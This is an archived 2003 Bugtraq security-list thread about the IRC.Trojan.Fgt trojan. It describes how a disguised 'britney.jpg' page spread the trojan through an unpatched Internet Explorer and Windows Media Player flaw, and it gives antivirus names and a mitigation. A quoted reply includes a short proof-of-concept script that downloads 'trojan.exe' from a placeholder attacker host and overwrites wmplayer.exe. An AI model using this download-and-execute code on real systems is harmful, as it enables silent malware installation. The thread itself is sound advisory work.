Re: a dangerous fast spreading (yet simple) trojan horse (Now IRC.Trojan.Fgt)

[K-OTiK Security <Special-Alerts () k-otik com>]

In-Reply-To: <20031027174719.11875.qmail () sf-www1-symnsj securityfocus com>

This trojan is now identified :

IRC.Trojan.Fgt [Symantec] IRC-Worm.Fagot [Kaspersky], Fagot [F-Secure] 
Type:  Trojan Horse 
Infection Length:  156,672 bytes 

IRC.Trojan.Fgt is a downloaded file that disables firewall and security software,it works by sending messages via IRC 
chat, trying to get people to click on a web link, which would download "britney.jpg" from www.angelfire.com. It 
deletes critical system files and changes the Internet Explorer home page to a pornographic page. 

The website which was responsible for distributing this threat is no longer available. So the worm doesn't work any 
more (this version).

More : http://securityresponse.symantec.com/avcenter/venc/data/irc.trojan.fgt.html

Regards.
K-OTik Staff /// http://www.k-otik.com

> From: K-OTiK Security <Special-Alerts () k-otik com>
> To: bugtraq () securityfocus com
> Subject: Re: a dangerous fast spreading (yet simple) trojan horse.
>
> it uses a well known IE unpatched vulnerability discovered by jelmer on Sep 11 2003 "Windows Media Player & Internet 
> Explorer File Download and Execution" :
>
> http://www.k-otik.com/WMPLAYER-TEST/
> http://www.securityfocus.com/archive/1/337285/2003-09-10/2003-09-16/2
> http://ip3e83566f.speed.planet.nl/hacked-by-chinese/5.htm
>
> To prevent this exploit : Disable Active Scripting 
>
> Regards. 
> K-Otik Staff /// http://www.k-otik.com
>
> ----------------------- POC -------------------------
>    var x = new ActiveXObject("Microsoft.XMLHTTP"); 
>    x.Open("GET", "http://attacker/trojan.exe",0); 
>    x.Send(); 
>    
>    var s = new ActiveXObject("ADODB.Stream");
>    s.Mode = 3;
>    s.Type = 1;
>    s.Open();
>    s.Write(x.responseBody);
>
>    s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
>    location.href = "mms://";
> -----------------------------------------------------
>
> > From: "Gadi Evron" <ge () egotistical reprehensible net>
> > Subject: a dangerous fast spreading (yet simple) trojan horse.
> > Date: Mon, 27 Oct 2003 16:52:57 -0800
> >
> > I usually do not email about "new" trojan horses unless they have
> > something "special" about them, for there are a lot of them coming out
> > non-stop. However, with this one,
> > Although quite simple, is very destructive and spreading at incredible
> > speed.
> >
> > The trojan horse spreads by people going to different URL's to download
> > a *.jpg (started with britney.jpg).
> >
> > The jpeg is actually an HTML file, and when the web browser receives it,
> > it thinks that it is a server error message for the file not existing,
> > and loads the page.
> >
> > In the page we find a javascript line, that using hex encoding in an
> > attempt to hide what it does, downloads patch.exe and replaces
> > mplayer.exe with the new file.
> > patch.exe connects to the mIRC DDE server, causing mIRC to spam, and
> > then it start ruining the system's registry. Starting to delete keys at
> > root and enumerating from there, one at a time.
> > What I signify, and forgive my language, as an "Hump and dump" trojan
> > horse.
> >
> > This reminds me of the first patch.exe trojan horse, that was purely a
> > destructive file - back in 95/96.
> >
> > I would also like to commend angelfire for shutting down the first web
> > page this appeared on very quickly. They always respond to abuse in a
> > timely manner. The geocities page is still up last time I checked.
> >
> > Not very complicated, but interesting, and very dangerous.
> >
> >      Gadi Evron (i.e. ge),
> >      ge () linuxbox org.
> >
> > --------
> > gevron () netvision net il
> > PGP Key: 2048/2048 (Size) 0x2D3D6741 (ID).
> > Fingerprint: 0EB3 00BC 974B 3C2B 336D 6486 ECA5 2D0D 2D3D 6741.